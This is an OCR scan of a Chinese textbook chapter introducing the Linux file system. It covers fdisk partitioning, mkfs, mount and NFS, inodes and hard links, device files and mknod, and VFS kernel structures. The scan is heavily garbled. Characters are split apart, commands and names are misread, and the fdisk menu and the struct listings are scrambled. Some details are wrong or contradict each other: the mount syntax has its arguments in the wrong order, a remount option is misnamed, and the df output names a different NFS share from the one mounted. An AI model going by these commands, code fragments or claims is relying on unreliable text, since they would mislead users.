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在 UNIX 族 的 操作 系统 中 ， 文 件 系统 占有 十 分 重要 的 地 位 ， 文 件 的 概念 涵盖 了 UNIX 
设备 和 操作 对 象 的 全 部 内 容 ， 对 设备 的 操作 方式 几乎 可 以 与 对 普通 文件 的 操作 等 价 。 本 章 
对 文件 系统 进行 简单 的 介绍 ， 主 要 包括 如 下 内 容 : 

口 Linux 下 文件 的 内 涵 ; 

Linux 下 的 文件 系统 布局 和 文件 系统 的 树 形 结构 ; 

Linux 下 的 普通 文件 和 设备 文件 ; 

Linux 下 虚拟 文件 系统 的 含义 ; 

文件 的 常用 操作 方法 、 文 件 句 柄 的 含义 、open0 〇 函数 、close() 函 数 、read() 函 数 和 
write() 函 数 的 使 用 及 简单 实例 ; 

口 文件 操作 的 高 级 用 法 ， 包 含 ioctl() 对 特定 设备 文件 进行 控制 ， 用 fent10) 函 数控 制 文 

件 ，mmap() 的 用 法 及 fstat() 获 得 文件 的 状态 值 及 状态 值 的 含义 。 


口 
口 
口 
口 


3.1 Linux 下 的 文件 系统 


文件 系统 狭义 的 概念 是 一 种 对 存储 设备 上 的 数据 进行 组 织 和 控制 的 机 制 。 在 Linux 下 
(当然 包含 UNIX)， 文 件 的 含义 比较 广泛 ， 文 件 的 概念 不 仅仅 包含 通常 意义 的 保存 在 磁盘 
的 各 种 格式 的 数据 ， 还 包含 目录 ， 甚 至 各 种 各 样 的 设备 ， 如 键盘 、 鼠 标 、 网 卡 、 标 准 输出 
等 ， 引 用 一 句 经 典 的 话 “UNIX 下 一 切 缘 文件 ”。 


3.1.1 Linux 下 文件 的 内 洒 


Linux 下 的 文件 系统 是 对 复杂 系统 进行 合理 抽象 的 一 个 经 典 的 例子 ， 它 通过 一 套 统一 
的 接口 函数 对 不 同 的 文件 进行 操作 。 例 如 open() 函 数 不 仅 可 以 打开 ext2 类 型 的 文件 ， 还 可 
以 打开 fat32 类 型 的 文件 ， 并 且 包 括 如 串口 设备 、 显 卡 等 ， 只 不 过 打开 设备 的 名 称 不 同 而 
已 。Linux 下 的 文件 主要 分 为 如 下 几 种 。 
口 普通 文件 : 例如 保存 在 磁盘 上 的 C 文件 、 可 执行 文件 ， 以 及 目录 等 ， 这 种 文件 的 
特性 是 数据 在 存储 设备 上 存放 ， 内 核 提 供 了 对 数据 的 抽象 访问 ， 此 种 文件 为 一 种 
字 节 流 ， 访 问 接口 完全 独立 于 在 磁盘 上 的 存储 数据 。 
口 字符 设备 文件 : 是 一 种 能 够 像 文 件 一 样 被 访问 的 设备 ， 例 如 控制 台 、 串 口 等 。 
口 块 设备 文件 : 磁盘 是 此 类 设备 文件 的 典型 代表 ， 与 普通 文件 的 区 别 是 操作 系统 对 
数据 的 访问 进行 的 重新 的 格式 设计 。 
口 socket 文件 : 它 是 Linux 中 通过 网 络 进行 通信 的 方式 , 对 网 络 的 访问 可 以 通过 文件 
描述 符 的 抽象 实现 ， 访 问 网 络 和 访问 普通 文件 相似 。 
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在 Linux 中 用 户 空间 对 各 种 文件 的 操作 是 类 似 的 , 因为 虚拟 文件 系统 VFS 提供 了 同一 
套 API。 


3.1.2 文件 系统 的 创建 


在 Linux 下 对 磁盘 进行 操作 的 工具 是 fdisk， 与 Windows 下 的 fdisk 功能 有 些 类 似 ,但 
是 命令 的 格式 完全 不 同 。 


系统 分 区 情况 
使 用 fdisk 命令 查看 当前 磁盘 的 情况 : 
# fdisk -1 ( 列 出 当前 系统 的 磁盘 情况 ) 
Disk /dev/sdb: 1073 MB, 1073741824 bytes (磁盘 sdb 的 大 小 ) 
255 heads，63 sectors/track，130 cylinders，total 2097152 sectors ( 柱 面 情况 
Units = "SecCtors of 1 % 512 = 512 bytes (每 个 单元 的 情况 ) 


Sector size (logical/physical): 512 bytes / 512 bytes 
I/O size (minimum/optimal): 512 bytes / 512 bytes 
Disk identifier: 0x00000000 


Disk /dev/sdb doesn't contain a valid partition table (磁盘 sdb 还 没有 进行 分 区 ) 


Disk /dev/sda: 32.2 GB, 32212254720 bytes (磁盘 sda 的 分 区 情况 ) 
255 heads, 63 sectors/track, 3916 cylinders, total 62914560 sectors 
Units = sectors of 1 * 512 = 512 bytes 

Sector size (logical/physical): 512 bytes / 512 bytes 

I/O size (minimum/optimal): 512 bytes / 512 bytes 

Disk identifier: 0x000e70b4 


Device Boot Start End Blocks Id System 

/dev/sdal * 2048 54527999 27262976 83 Linux 
(sdal 的 开始 、 结 束 、 分 区 类 型 ) 

/dev/sda2 54530046 62912511 4191233 5 Extended 
(sda2 为 扩展 分 区 ) 

/dev/sda5 54530048 62912511 4191232 82 Linux swap / Solaris 
(sda5 逻辑 分 区 ) 

2. 建立 分 区 


可 以 看 到 ， 人 磁盘 /dev/sdb 没有 使 用 ， 现 在 尝试 用 fdisk 在 没有 使 用 的 磁盘 /dev/sdb 上 进 
行 分 区 ， 先 查看 分 区 情况 ， 然 后 建立 一 个 100M 大 小 的 初级 分 区 ， 将 分 区 表 写 入 磁盘 并 
退出 : 


# fdisk /dev/sdb (对 sdb 进行 分 区 ) 
Device contains neither a valid DOS partition table, nor Sun, SGI or OSF 
disklabel 


Building a new DOS disklabel with disk identifier 0x5607bafl. 
Changes will remain in memory only, until you decide to write them. 
After that, of course, the previous content won't be recoverable. 


Warning: invalid flag 0x0000 of partition table 4 will be corrected by w (rite) 


Command (m for help): p (查看 磁盘 当前 的 分 区 情况 ) 
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255 heads, 
Units 
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1073 MB, 1073741824 bytes 
63 sectors/track, 130 cylinders, total 2097152 sectors 
= sectors of 1 * 512 = 512 bytes 


Sector size (logical/physical): 512 bytes / 512 bytes 


I/O size (minimum/optimal): 


Disk identifier: 0x5607bafl 


Device Boot 


Start End 


Command (m for help) : m( 打 印 命令 ) 
Command action 


[7 


ed et wn 0 oO sy Hm a oo 


x 


toggle a bootable flag 
edit bsd disklabel 


toggle the dos compatibility flag 


delete a partition 

list known partition types 
print this menu 

add a new partition 


Create a new empty DOS partition table 


print the partition table 
quit without saving changes 


Create a new empty Sun disklabel 


change a partition's system id 
change display/entry units 
verify the partition table 
write table to disk and exit 


extra functionality (experts only) 


Command (m for help): n 
Partition type: 


本 
e 


primary (0 primary, 0 extended, 4 free) 


extended 


Select (default p):p 

Partition number (1-4): 1 
First sector (2048-2097151，default 2048) : (开始 扇 区 ,默认 为 2048) 
Using default value 2048 
Last sector，+Sectors or +size{K,M,G} (2048-2097151, default 2097151) : +100M 


Command (m for help): w 


The partition table has been altered! 


Blocks 


512 bytes / 512 bytes 


Id System 


(设置 为 启动 分 区 ) 
(编辑 bsd 磁盘 ) 

(设置 dos 兼容 标志 ) 

(删除 一 个 分 区 ) 

( 列 出 当前 系统 可 支持 的 分 区 方式 ) 


(增加 一 个 分 区 ) 

(建议 一 个 新 的 Dos 分 区 表 ) 
(打印 分 区 情况 ) 

(不 保存 退出 ) 

(建立 一 个 新 的 Sun 空 磁盘 ) 
(改变 分 区 的 ID) 

(改变 显示 单元 ) 

(修正 分 区 表 ) 

(将 之 前 的 修改 写 入 磁盘 并 推出 ) 
(专家 模式 ) 

(建立 一 个 新 分 区 ) 
(选择 分 区 类 型 ) 

( 主 分 区 ) 
(扩展 分 区 ) 

(输入 P, 选择 建立 一 个 主 分 区 ) 
(分 区 的 第 一 个 分 区 ) 


( 按 下 Enter 键 , 选择 默认 值 ) 


(建立 一 个 100Mbytes 的 分 区 ) 
( 写 入 磁盘 并 退出 ) 


Calling ioct1() to re-read partition table. (调用 ioctl() 函数 重读 分 区 进行 检查 ) 
Syncing disks. 


3. 查看 分 区 是 否 成 功 
列 出 系统 的 分 区 情况 ， 查 看 上 述 分 区 操作 是 否 成 功 。 


1 


Disk /dev/sdb: 
224 heads, 
Units 
Sector size (logical/physical): 


1073 MB, 1073741824 bytes 

19 sectors/track, 492 cylinders, total 2097152 sectors 
= sectors of 1 * 512 = 512 bytes 

512 bytes / 512 bytes 


(同步 磁盘 ,将 缓存 的 信息 写 入 磁盘 ) 


I/O size (minimum/optimal): 512 bytes / 512 bytes 
Disk identifier: 0x4629e5b8 


Device Boot 


Start End 


Blocks 


Id System 
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/dev/sdbl 2048 206847 102400 83 Linux 


Disk /dev/sda: 32.2 GB, 32212254720 bytes 

255 heads, 63 sectors/track, 3916 cylinders, total 62914560 sectors 
Units = sectors of 1 * 512 = 512 bytes 

Sector size (logical/physical): 512 bytes / 512 bytes 

I/0 size (minimum/optimal): 512 bytes / 512 bytes 

Disk identifier: 0x000e70b4 


Device Boot Start End Blocks Id System 
/dev/sdal * 2048 54527999 27262976 83 Linux 
/dev/sda2 54530046 062912511 4191233 5 Extended 
/dev/sda5 54530048 62912511 4191232 82 Linux swap / Solaris 
4. 格式 化 分 区 


磁盘 多 一 个 sdbl 分 区 。 仅 进行 分 区 ， 分 区 后 的 空间 并 不 能 使 用 ， 需 要 使 用 mkfs 格式 
化 分 区 sdbl: 


# mkfs.ext4 /dev/sdbl (将 /dev/sdbl 格式 化 为 ext4 类 型 的 系统 ) 
mke2fs 1.42 (29-Nov-2011) 
文件 系统 标签 = 
OS type: Linux 
块 大 小 =1024 (1og=0) 
分 块 大 小 =1024 (1og=0) 
Stride=0 blocks, Stripe width=0 blocks 
25688 inodes, 102400 blocks 
5120 blocks (5.00%) reserved for the super user 
第 一 个 数据 块 =1 
Maximum filesystem blocks=67371008 
13 block groups 
8192 blocks per group, 8192 fragments per group 
1976 inodes per group 
Superblock backups stored on blocks: 
8193, 24577, 40961, 57345, 73729 


Allocating group tables: 完成 

正在 写 入 inode 表 : 完成 

Creating journal (4096 blocks): 完成 

Writing superblocks and filesystem accounting information: 完 


5. 挂 载 分 区 

建立 一 个 /test 目录 ， 将 sdbl 挂 接 上 去 。 

# mount /dev/sdbl /test 

6. 查看 分 区 挂 载 情况 

命令 df 可 以 查看 当前 文件 系统 的 情况 ， 例 如 : 


# df 

文件 系统 1K- 块 ”已 用 可 用 已 用 % 挂 载 点 
/dev/sdal 26835196 5602632 19869416 22% / 
udev 2053344 4 2053340 1% /dev 
tmpfs 824264 808 823456 1% /run 
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none 5120 0 5120 0% /run/lock 
none 2060652 152 2060500 1% /run/shm 
/dev/sdbl 99150 5646 88384 7% /test 


3.1.3” 挂 接 文件 系统 


Linux 系统 下 ， 要 使 用 一 个 文件 系统 需要 先 将 文件 系统 的 分 区 挂 载 到 系统 上 。mount 
命令 用 于 挂 载 文 件 ， 它 有 很 多 选项 。mount 命令 的 使 用 格式 为 : 


mount -t type mountpoint device -o options 


上 述 命令 表示 将 文件 类 型 为 type 的 设备 device 挂 载 到 mountpoint 上 ， 挂 载 时 要 遵循 
options 的 设置 。 

进行 分 区 挂 载 时 经 常 使 用 的 是 -t 选项 。 例 如 ,“-t vfat” 表 示 挂 载 Windows 下 的 fat32 
等 文件 类 型 ;“-tproc” 则 表示 挂 载 proc 文件 类 型 。 

挂 载 命令 的 -o 选项 是 一 个 重量 级 的 设置 ， 经 常用 于 挂 载 比较 特殊 的 文件 属性 。 在 嵌入 
式 Linux 下 ， 根 文件 系统 经 常 是 不 可 写 的 ， 要 对 其 中 的 文件 进行 修改 ， 需 要 使 用 -o 选项 重 
新 进行 挂 载 。 例 如 ,“-o rewrite,rw” 将 文件 系统 重新 进行 挂 载 ， 并 将 其 属性 改 为 可 读 写 。 

Linux 也 支持 挂 载 网 络 文件 系统 ， 例 如 NFS 文件 系统 等 ， 挂 载 NFS 文件 系统 的 命令 
如 下 : 

mount -t nfs 服务 器 地 址 : /目录 挂 载 点 


下 面 是 一 个 挂 载 nfs 文件 系统 的 例子 , 例如 在 IP 地 址 为 192.168.1.150 的 机 器 做 了 一 个 
NFS 服务 器 ， 提 供 192.168.1.x 网 段 上 的 NFS 服务 。 可 以 使 用 下 面 的 命令 来 实现 : 


# showmount -e 192.168.1.150 (查看 NFS 服务 器 共享 的 文件 文件 夹 ) 

Export ist £0r 92569 505 

/opt/nfsroot (位 于 192.168.1.150 机 器 上 的 /opt/nfsroot 目录 ) 

# mkdir /mnt/nfsmount (在 本 地 机 器 建 一 个 目录 , 作为 NFS 挂 载 点 ) 

# mount -t nfs 192.168.1.150:/opt/nfsroot /mnt/nfsmount  ( 挂 载 NFS) 

# df -h (查看 本 地 机 挂 载 NFS 是 不 是 成 功 了 

文件 系统 容量 己 用 可 用 已 用 % 挂 载 点 

/dev/sdal 26G 5.4G 19G 22%/ 

udev 2.0G 4.0K 2.0G 1% /dev 

tmpfs 805M 804K 805M 1% /run 

none 5.0M 0 5.0M 0% /run/lock 

none 2.0G 152K 2.0G 1% /run/shm 

/dev/sdbl 97M 5.6M 87M 7% /test 

192.168.1.4:/opt/sirnfs 63G 47G 17G 74% /mnt/nfsmount 
(这 是 挂 载 成 功 后 的 显示 ) 


3.1.4 索引 节点 inode 


在 Linux 下 存储 设备 或 存储 设备 的 某 个 分 区 格式 化 为 文件 系统 后 ， 有 两 个 主要 的 概念 
来 描述 它 ， 一 个 是 索引 节点 〈inode)， 另 一 个 是 块 《Block)。 块 是 用 来 存储 数据 的 ， 索 引 
节点 则 是 用 来 存储 数据 的 信息 ， 这 些 信 息 包 括 文件 大 小 、 属 主 、 归 属 的 用 户 组 、 读 写 权限 
等 。 索 引 节点 为 每 个 文件 进行 信息 索引 ， 所 以 就 有 了 索引 节点 的 数值 。 

通过 查询 索引 节点 ， 能 够 快速 地 找到 对 应 的 文件 。 这 就 像 一 本 书 ， 存 储 设备 是 一 本 书 
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的 整体 ， 块 是 书 的 内 容 ， 而 索引 节点 相当 于 一 本 书 的 目录 ， 如 果 要 查询 某 方面 的 内 容 ， 可 
以 通过 查询 前 面 的 目录 ， 快 速 地 获得 内 容 的 信息 ， 例 如 位 置 、 大 小 等 。 

要 查看 索引 节点 的 信息 ， 可 以 使 用 命令 ls， 加 上 参数 -i。 例 如 ， 使 用 ls 查看 hello.c 的 
索引 节点 信息 ， 可 知 索引 节点 的 值 为 1050150。 


$1s -1li hello.c 
1050150 -rw-rw-r-- 1 linux-c linux-c 77 5 月 29 14:57 hello.c 


在 Linux 的 文件 系统 中 ， 索 引 节 点 值 是 文件 的 标识 ， 并 且 这 个 值 是 唯一 的 ， 两 个 不 同 
文件 的 索引 节点 值 是 不 同 的 , 索引 节点 值 相同 的 文件 它 的 内 容 是 相同 的 , 仅仅 文件 名 不 同 。 
修改 两 个 索引 节点 值 相同 的 文件 中 的 一 个 文件 ， 另 一 个 文件 的 内 容 也 跟着 发 生 改变 。 例 如 
下 面 的 一 个 例子 ， 使 用 命令 In 为 文件 hello.c 创建 一 个 硬 链 接 ， 命 名 其 文件 名 为 hello2.c， 
查看 属性 的 变化 情况 。 


$1s -1i hello.c (查看 hello.c 的 属性 ) 
1050150 -rw-rw-r-- 1 linux-c linux-c 77 5 月 29 14:57 hello.c 
$ ln hello.c hello2.c (通过 ln 来 创建 hello.c 的 硬 链接 文件 hello2.c ) 


$ 1s -li hello* ( 列 出 hello.c 和 hello2.c ) 
1050150 -rw-rw-r-- 2 linux-c linux-c 77 5 月 29 14:57 hello2.c 
1050150 -rw-rw-r-- 2 linux-c linux-c 77 5 月 29 14:57 hello.c 


可 以 看 出 ,hello.c 在 没有 创建 硬 链接 文件 hello2.c 的 时 候 ,其 链接 个 数 是 1( 即 -rw-rw-r-- 
后 的 那个 数值 )， 创 建 了 硬 链接 hello2.c 后 ， 这 个 值 变 成 了 2。 也 就 是 说 ， 每 次 为 hello.c 创 
建 一 个 新 的 硬 链接 文件 后 ， 其 硬 链接 个 数 都 会 增加 1。 

索引 节点 值 相同 的 文件 ， 二 者 的 关系 是 互 为 硬 链接 。 当 修改 其 中 一 个 文件 的 内 容 时 ， 
互 为 硬 链 接 的 文件 内 容 也 会 跟着 变化 。 如 果 删 除 互 为 硬 链接 关系 的 某 个 文件 时 ， 其 他 的 文 
件 并 不 受 影响 。 例 如 把 hello2.c 删除 后 ， 还 是 一 样 能 看 到 hello.c 的 内 容 ， 并 且 hello.c 仍 是 
存在 的 。 这 是 由 于 索引 节点 对 于 每 一 个 文件 有 一 个 引用 计数 ， 当 创建 硬 链接 的 时 候 ， 引 用 
计数 会 增加 1， 删 除 文件 的 时 候 引 用 计数 会 减 1， 当 引用 计数 为 0 的 时 候 ， 系 统 会 删除 此 
文件 。 

目录 不 能 创建 硬 链 接 ， 只 有 文件 才能 创建 硬 链接 。 如 果 目 录 也 可 以 创建 便 链 接 ， 很 容 
易 在 系统 内 部 形成 真实 的 环 状 文件 系统 ， 对 文件 系统 的 维护 造成 很 大 的 困难 。 目 录 可 以 使 
用 软 链 接 的 方式 创建 ， 可 使 用 命令 “ln -s”。 


3.1.5 ”普通 文件 


普通 文件 是 指 在 硬盘 、CD、U 盘 等 存储 介质 上 的 数据 和 文件 结构 。 在 本 节 中 所 指 的 文 
件 系统 是 一 个 狭义 的 概念 ， 仅 仅 按照 普通 文件 在 磁盘 中 组 织 方式 的 不 同 来 区 分 。 

普通 文件 的 概念 与 Windows 下 面 文件 的 概念 是 相同 的 。 可 以 对 文件 进行 打开 、 读 出 数 
据 、 写 入 数据 、 关 闭 、 删 除 等 操作 。 

在 Linux 下 ， 目 录 也 作为 一 种 普通 文件 存在 。 


3.1.6 设备 文件 
Linux 下 用 设备 文件 来 表示 所 支持 的 设备 ， 每 个 设备 文件 除了 设备 名 ， 还 有 3 个 属性 ， 


。66 。 


第 3 章 文件 系统 简介 


即 类 型 、 主 设备 号 、 次 设备 号 。 例 如 ， 查 看 sdb1， 可 以 获得 磁盘 分 区 sdbl 的 属性 ， 属 性 
的 含义 如 下 : 

$1ls /dev/sdbl -1 

brw-rw---- 1 root disk 8, 17 5 月 30 17:20 /dev/sdbl 


口 设备 类 型 : 设备 属性 的 第 一 个 字符 是 这 个 设备 文件 的 类 型 。 第 一 个 字符 为 ce, 表明 
这 个 设备 是 一 个 字符 设备 文件 。 第 一 个 字符 为 b, 表明 这 个 设备 是 一 个 块 设备 文件 。 
sdbl 的 第 1 个 字符 为 bp， 可 知 它 是 一 个 块 设备 文件 。 

口 主 设备 号 : 每 一 个 设备 文件 都 有 一 个 “ 主 设备 号 ”， 使 用 ls -1 命令 输出 的 第 5 个 
字段 即 为 主 设备 号 。 主 设备 号 是 表示 系统 存 取 这 个 设备 的 “内 核 驱 动 ”。 驱 动 程 
序 是 Linux 内 核 中 代码 的 一 部 分 ， 其 作用 是 用 来 控制 一 种 特殊 设备 的 输入 输出 。 
大 多 数 的 Linux 操作 系统 都 有 多 种 设备 驱动 程序 ， 每 一 个 设备 文件 名 中 的 主 设备 
号 就 代表 这 个 设备 使 用 的 是 那个 设备 驱动 程序 。lsdev 命令 可 以 列 出 当前 内 核 中 配 
置 的 驱动 程序 和 这 些 驱动 程序 对 应 的 主 设备 号 。 

口 次 设备 号 : 每 一 个 设备 文件 都 有 一 个 次 设备 号 。“ 次 设备 号 ”是 一 个 24 位 的 十 六 
进 制 数字 ， 它 定义 了 这 个 设备 在 系统 中 的 物理 位 置 。 

口 设备 文件 名 : 设备 文件 名 用 于 表示 设备 的 名 称 ， 它 遵循 标准 的 命令 方式 ， 使 得 设 
备 的 分 辨 更 容易 。 


1. 字符 设备 与 块 设备 


字符 类 型 的 设备 可 以 在 一 次 数据 读 写 过 程 中 传送 任意 大 小 的 数据 ， 多 个 字符 的 访问 是 
通过 多 次 读 写 来 完成 的 ， 通 常用 于 访问 连续 的 字符 。 例 如 ， 终 端 、 打 印 机 、moderm 和 绘 
图 仪 等 设备 是 字符 类 型 设备 。 

块 设备 文件 可 以 在 一 次 读 写 过 程 中 访问 固定 大 小 的 数据 ， 通 过 块 设备 文件 进行 数据 读 
写 的 时 候 ， 系 统 先 从 内 存 的 缓冲 区 中 读 写 数据 ， 而 不 是 直接 与 设备 进行 数据 读 写 ， 这 种 访 
问 方式 可 以 大 幅度 地 提高 读 写 性 能 。 块 类 型 设备 可 以 随机 地 访问 数据 ， 而 数据 的 访问 时 间 
和 数据 位 于 设备 中 的 位 置 无 关 。 常 用 的 块 设备 有 硬盘 、 软 盘 和 CD-ROM 及 RAM 类 型 磁盘 。 


2. 设备 文件 的 创建 
设备 文件 是 通过 mknod 命令 来 创建 的 。 其 命令 格式 为 : 


mknod [OPTION]... NAME TYPE [MAJOR MINOR] 


其 参数 有 设备 文件 名 NAME、 操 作 模式 TYPE、 主 设备 号 MAJOR 及 次 设备 号 MINOR。 
主 设备 号 和 次 设备 号 两 个 参数 合并 成 一 个 16 位 的 无 符号 短 整数 , 高 8 位 表示 主 设备 号 , 低 
8 位 表示 次 设备 号 。 可 以 在 include/Linux/majorh 文件 中 找到 所 支持 的 主 设备 号 。 

设备 文件 通常 位 于 /dev 目录 下 ， 表 3.1 显示 了 目录 /dev 下 的 一 些 设备 文件 的 属性 。 注 
意 同 一 主 设备 号 既 可 以 标识 字符 设备 ， 也 可 以 标识 块 设备 。 
一 个 设备 文件 通常 与 一 个 硬件 设备 (如 硬盘 ，/dev/hda) 相关 联 ， 或 者 与 硬件 设备 的 某 
一 物理 或 逻辑 分 区 (如 磁盘 分 区 ，/dev/hda2) 相关 联 。 但 在 某 些 情况 下 ， 设 备 文件 不 会 和 
任何 实际 的 硬件 关联 , 而 是 表示 一 个 虚拟 的 逻辑 设备 。 例 如，/dev/null 就 是 对 应 于 一 个 “ 黑 
洞 ” 的 设备 文件 ， 所 有 写 入 这 个 文件 的 数据 都 被 简单 地 丢弃 。 
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表 3.1 Linux 下 的 设备 名 简介 


设备 名 设备 类 型 主 设备 号 次 设备 号 说 明 
/dewfd0 块 设备 2 0 软磁盘 
/dev/hda 块 设备 3 0 第 1 个 IDE 类 型 硬盘 
/dev/hda2 块 设备 第 1 个 IDE 硬盘 上 的 第 2 个 主 分 区 
/dev/hdb 块 设备 3 64 第 2 个 IDE 硬盘 
/dewhdb3 块 设备 67 第 2 个 IDE 硬盘 上 的 第 3 个 主 分 区 
/dev/ttyp0 字符 设备 3 0 终端 
/dev/console 字符 设备 5 1 控制 台 
/dev/lpl 字符 设备 6 1 打印 机 
/dewittyS0 字符 设备 4 64 第 一 个 串口 
/dev/rte 字符 设备 实时 时 钟 
/devnull 字符 设备 空 设备 


3. 设备 文件 的 简单 操作 


设备 描述 符 /dev/console 是 控制 台 的 文件 描述 符 ， 可 以 对 其 进行 操作 , 例如 下 面 的 命令 
将 可 能 造成 系统 循环 运行 ， 甚 至 死机 。 


$cat /dev/console 


上 面 的 命令 将 控制 台 的 输入 打印 出 来 。 下 面 的 命令 向 标准 输出 传 入 字符 串 test， 系 统 
将 字符 串 test 发 给 标准 输出 : 


$echo "test">/dev/stdout 


嵌入 式 设 备 中 常用 的 Framebuffer 设备 是 一 个 字符 设备 ， 当 系统 打开 Framebuffer 设置 

的 时 候 (通常 可 以 在 系统 启动 的 时 候 ， 修 改 启动 参数 ， 例 如 在 kernel 一 行 增加 vga=0x314 

启动 一 个 800X600 分 辨 率 的 帧 缓冲 设备 ), 运行 如 下 命令 ， 先 将 Framebuffer 设备 fb0 的 数 
写 入 文件 test.txt 中 ， 然 后 利用 cat 命令 将 数据 写 入 帧 缓存 设备 fb0: 


$cat /dev/fb0 > test.txt (获得 帧 缓存 设备 的 数据 ) 
$cat test.txt > /dev/fb0 (将 数据 写 入 帧 缓存 设备 ) 


3.1.7 ”虚拟 文件 系统 VFS 


Linux 的 文件 系统 是 由 虚拟 文件 系统 作为 媒介 搭建 起 来 的 , 虚拟 文件 系统 VFS (Virtual 
File Systems) 是 Linux 内 核 层 实现 的 一 种 架构 ， 为 用 户 空间 提供 统一 的 文件 操作 接口 。 它 
在 内 核 内 部 为 不 同 的 真实 文件 系统 提供 一 致 的 抽象 接口 。 

如 图 3.1 所 示 ， 用 户 应 用 程序 通过 系统 调用 ， 与 内 核 中 的 虚拟 文件 系统 交互 ， 操 作 实 
际 的 文件 系统 和 设备 。 

在 图 3.1 中 可 以 看 出 , Linux 文件 系统 支持 多 种 类 型 的 文件 ， 对 多 种 类 型 的 文件 系统 进 
行 了 抽象 。 通 过 一 组 相同 的 系统 调用 接口 ，Linux 可 以 在 各 种 设备 上 实现 多 种 不 同 的 文件 
系统 。 例 如 ，write() 函 数 可 以 向 多 种 不 同 的 文件 系统 上 写 入 数据 ， 调 用 write0) 函 数 的 应 用 
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户 应 用 程序 
GNU GER] 户 空间 
nt ee ee a ps ed ei es Mit ed i sh i i dh 
系统 调用 接口 内 核 空 间 


: - -| | 
节点 索引 可 | 
| “入 和 | 一 | 虚拟 文件 系统 上 | 目录 缓存 | 


文件 ， 
ext2 文 件 系统 | .，[vfat 文 件 系统 | 系统 | 


设备 驱动 
图 3.1 Linux 文件 系统 示意 图 


程序 不 用 管 文件 的 具体 存储 位 置 和 文件 系统 的 类 型 ， 但 是 当 写 入 数据 的 时 候 ， 函 数 会 正常 
返回 。 

VFS 是 文件 系统 的 接口 框架 。 这 个 组 件 导 出 一 组 接口 ， 然 后 将 它们 抽象 到 各 个 文件 系 
统 ， 各 个 文件 系统 的 具体 实现 方式 差异 很 大 。 有 两 个 针对 文件 系统 对 象 的 缓存 〈inode 和 
dentry)， 它 们 缓存 的 对 象 是 最 近 使 用 过 的 文件 系统 。 

每 个 文件 系统 实现 〈 如 ext4、vfat 等 ) 导出 一 组 通用 接口 ， 供 VFS 使 用 。 缓 冲 区 用 于 
缓存 文件 系统 和 相关 块 设备 二 者 之 间 的 请 求 。 例 如 ， 对 底层 设备 驱动 程序 的 读 写 请 求 会 通 
过 绥 冲 区 缓存 来 传递 。 这 就 允许 在 其 中 缓存 请 求 ， 减 少 访问 物理 设备 的 次 数 ， 加 快 访问 速 
度 。 以 最 近 使 用 (LRU) 列表 的 形式 管理 缓冲 区 缓 在。 注意， 可 以 使 用 synce 命令 将 缓冲 区 
缓存 中 的 请 求 发 送 到 存储 媒体 〈 人 迫使 所 有 未 写 的 数据 发 送 到 设备 驱动 程序 ， 进 而 发 送 到 存 
储 设备 )。 


1. 文件 系统 类 型 


Linux 的 文件 系统 用 一 组 通用 对 象 来 表示 ， 这 些 对 象 是 超级 块 (superblock)、 节 点 索 
引 (inode)、 目 录 结 构 〈dentry) 和 文件 (file)。 

超级 块 是 每 种 文件 系统 的 根 ， 用 于 描述 和 维护 文件 系统 的 状态 。 文 件 系统 中 管理 的 每 
个 对 象 〈 文 件 或 目录 ) 在 Linux 中 表示 为 一 个 索引 节点 inode。 

inode 包含 管理 文件 系统 中 的 对 象 所 需 的 所 有 元 数据 (包括 可 以 在 对 象 上 执行 的 操作 )。 
另 一 组 结构 称 为 dentry， 它 们 用 来 实现 名 称 和 inode 之 间 的 映射 ， 有 一 个 目录 缓存 用 来 保 
存 最 近 使 用 的 dentry 。 

dentry 还 维护 目录 和 文件 之 间 的 关系 ,支持 目录 和 文件 在 文件 系统 中 的 移动 。VFS 文 
件 表示 一 个 打开 的 文件 (保存 打开 的 文件 的 状态 ， 像 文件 的 读 偏 移 量 和 写 偏 移 量 等 )。 


struct file system type { 


const char *#name; /* 文 件 类 型 名 称 */ 

int fs flagss; /* 标 志 */ 

struct super block *(*read super) (struct super block *#, void *, 
由 /* 读 超级 块 函数 */ 
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struct module *OWNer; 
struct file system type * next; 


struct list head 


}; 


fs_supers; 
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/* 所 有 者 */ 
/* 下 一 个 文件 类 型 */ 
/# 头 结构 */ 


可 以 使 用 一 组 注册 函数 在 Linux 中 动态 地 添加 或 删除 文件 系统 。Linux 的 内 核 中 保存 
系统 所 支持 的 文件 系统 的 列表 ， 可 以 通过 /proc 文件 系统 在 用 户 空间 中 查看 这 个 列表 。 虚 拟 
文件 系统 还 显示 当前 系统 中 与 文件 系统 相关 联 的 具体 设备 。 在 Linux 中 添加 新 文件 系统 的 


日 register filesystem。 这 个 函数 的 参数 定义 一 个 文件 系统 结构 (file_system type) 


的 引用 ， 这 个 结构 定义 文件 系统 的 名 称 、 一 组 属性 和 两 个 超级 块 函数 ， 也 可 以 注销 文件 


中 。 


在 注册 新 的 文件 系统 时 ， 会 把 这 个 文件 系统 和 它 的 相关 信息 添加 到 file_systems 列表 


$ cat /proc/filesystems 
nodev sysfs 
nodev rootfs 
nodev proc 
nodev sockfs 
nodev pipefs 
nodev tmpfs 
nodev ramfs 
nodev mqueue 
nodev usbfs 
ext3 
nodev vmhgfs 
nodev vmblock 


2. 超级 块 


超级 块 结构 用 来 表示 一 个 文件 系统 ， 


struct super block { 


unsigned long long 
struct file system type 


const struct super operations 


char s_id[32]; 
}; 


在 命令 行 上 输入 cat/proc/filesystems， 就 可 以 查看 这 个 列表 。 例 如 : 


/*sys 文件 */ 
/*root 文件 */ 
/*proc 文件 */ 
/* 套 接 字 文件 */ 
/* 管 道 文 件 */ 
/* 临 时 文件 */ 
/* 内 存 文件 */ 
/* 队 列 */ 
/*USB 文件 */ 
/*EXT3 类 型 文件 */ 
/* 虚 拟 机 */ 


/* 最 大 文件 尺寸 */ 
/* 文 件 的 类 型 */ 


/* 超 级 块 的 操作 , 主要 是 对 inode 的 操作 */ 


/* 文 件 系统 的 名 称 */ 


由 于 篇 幅 的 关系 省 略 了 很 多 信息 ,读者 可 以 从 linux/fs.h 文件 中 获得 全 部 的 代码 。 这 个 
结构 包含 一 个 文件 系统 所 需要 的 信息 ， 例 如 文件 系统 名 称 、 文 件 系 统 中 最 大 文件 的 大 小 ， 

以 及 对 inode 块 的 操作 函数 等 。 在 Linux 系统 中 每 种 文件 类 型 都 有 一 个 超级 块 ， 例 如 ， 如 
果 系 统 中 存在 ext4 和 vfat， 则 存在 两 个 超级 块 ， 分 别 表示 ext4 文件 系统 和 vfat 文件 系统 。 


struct super operations { 
struct inode 


void (*destroy inode) (struct inode *); 
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*(*alloc inode) (struct super _ block *sb) ; /* 申 请 节点 */ 


/* 销 毁 节点 */ 
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void (*dirty inode) (struct inode *); 
